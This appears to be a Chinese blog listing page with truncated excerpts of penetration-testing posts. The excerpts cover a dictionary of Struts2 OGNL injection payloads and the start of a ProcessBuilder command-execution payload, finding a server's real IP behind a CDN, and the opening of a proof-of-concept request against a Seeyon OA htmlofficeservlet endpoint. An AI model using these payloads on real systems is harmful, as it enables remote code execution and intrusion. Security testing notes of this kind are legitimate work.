摘要:
测试POC字典: redirect:%25{3*4} redirect%3A%24%7B3%2A4%7D action%3A%24%7B3%2A4%7D 执行命令: # 进行url编码 redirect:${#a=new java.lang.ProcessBuilder(new java.lang. 阅读全文
posted @ 2020-12-20 13:26
会HelloWorld的土拨鼠
阅读(212)
评论(0)
推荐(0)
摘要:
查询历史ip时发现好多个ip,判断有cdn,而最后一个ip记录时2017年,故该ip可能为真实ip 阅读全文
posted @ 2020-12-20 13:11
会HelloWorld的土拨鼠
阅读(99)
评论(0)
推荐(0)
摘要:
访问:http://xxxx/seeyon/htmlofficeservlet,看到 POC: POST /seeyon/htmlofficeservlet HTTP/1.1 Host: x.x.x.x Cache-Control: max-age=0 Upgrade-Insecure-Reques 阅读全文
posted @ 2020-12-20 11:30
会HelloWorld的土拨鼠
阅读(2217)
评论(0)
推荐(0)
浙公网安备 33010602011771号